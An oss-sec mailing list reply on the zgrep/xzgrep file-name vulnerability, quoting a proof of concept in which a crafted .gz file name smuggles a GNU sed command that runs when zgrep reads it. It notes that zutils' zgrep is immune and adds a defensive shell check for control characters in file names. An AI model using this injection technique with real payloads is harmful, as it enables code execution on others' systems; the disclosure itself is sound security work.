oss-sec mailing list archives
Re: zgrep, xzgrep: arbitrary-file-write vulnerability
From: Axel Beckert <abe () deuxchevaux org>
Date: Fri, 8 Apr 2022 11:18:12 +0200
Hi,

On Fri, Apr 08, 2022 at 10:23:29AM +0200, Jakub Wilk wrote:
> As mentioned in the xz patch, if you have GNU sed, you get not just file write, but direct code execution.

Ouch.

> PoC:
>
>    $ touch foo.gz
>    $ echo foo | gzip > "$(printf '|\n;e cowsay pwned\n#.gz')"
>    $ zgrep foo *.gz
>     _______
>    < pwned >
>     -------
>            \   ^__^
>             \  (oo)\_______
>                (__)\       )\/\
>                    ||----w |
>                    ||     ||
>    foo

JFTR, if you have replaced GNU's zgrep with zgrep from zutils
(https://www.nongnu.org/zutils/zutils.html; allows using z* tools with
many compression formats, also mixed in a single command), then this
exploit does not work:

abe@c6:~/tmp/zgrep-PoC $ touch foo.gz
abe@c6:~/tmp/zgrep-PoC $ echo foo | gzip > "$(printf '|\n;e cowsay pwned\n#.gz')"
abe@c6:~/tmp/zgrep-PoC $ zgrep foo *.gz
|
;e cowsay pwned
#.gz:foo
abe@c6:~/tmp/zgrep-PoC $ zgrep.gzip foo *.gz
 _______
< pwned >
 -------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
foo
abe@c6:~/tmp/zgrep-PoC $ dpkg -S /bin/zgrep
diversion by zutils from: /bin/zgrep
diversion by zutils to: /bin/zgrep.gzip
gzip, zutils: /bin/zgrep
abe@c6:~/tmp/zgrep-PoC

Kind regards, Axel
-- 
PGP: 2FF9CD59612616B5         /~\  Plain Text Ribbon Campaign, http://arc.pasp.de/
Mail: abe () deuxchevaux org  \ /  Say No to HTML in E-Mail and Usenet
Mail+Jabber: abe () noone org  X   https://axel.beckert.ch/
                              / \  I love long mails: https://email.is-not-s.ms/
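A pre-flight check a defender could run before handing a glob such as *.gz from an untrusted directory to zgrep or xzgrep, given here as an added example that is not code from this thread or from gzip, xz or zutils: it flags directory entries whose names contain a newline or another control character, as the PoC file name in the message above does. The function names has_ctrl, audit_dir and demo are made up for this example, and the file names in demo are constructed.

```sh
#!/bin/sh
# Added example, not from the thread: report directory entries whose names
# contain control characters (the PoC name above embeds newlines).

NL='
'

# has_ctrl NAME -> exit 0 if NAME contains a newline or other control character
has_ctrl() {
    case $1 in
        *"$NL"* | *[[:cntrl:]]*) return 0 ;;
    esac
    return 1
}

# audit_dir DIR -> prints each offending name on a single line, with control
# characters shown as '?'; exit status is 1 if any were found, otherwise 0
audit_dir() {
    dir=$1
    found=0
    # the three globs together cover regular and dot-file names
    for path in "$dir"/* "$dir"/.[!.]* "$dir"/..?*; do
        # unmatched globs stay literal; skip anything that does not exist
        [ -e "$path" ] || [ -L "$path" ] || continue
        name=${path##*/}
        if has_ctrl "$name"; then
            printf '%s' "$name" | tr '[:cntrl:]' '?'
            printf '\n'
            found=1
        fi
    done
    return "$found"
}

# Constructed demo: one ordinary name and one name with an embedded newline
demo() {
    d=$(mktemp -d) || return 2
    : > "$d/ok.gz"
    : > "$d/$(printf 'a\nb.gz')"
    rc=0
    audit_dir "$d" || rc=$?
    rm -rf "$d"
    return "$rc"
}
```

Calling demo prints a?b.gz and returns 1; a wrapper script can run audit_dir first and only invoke zgrep when it returns 0.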
Current thread:
- zgrep, xzgrep: arbitrary-file-write vulnerability Jim Meyering (Apr 07)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Jakub Wilk (Apr 08)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Axel Beckert (Apr 08)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Levente Polyak (Apr 08)
- Re: zgrep, xzgrep: arbitrary-file-write vulnerability Jakub Wilk (Apr 08)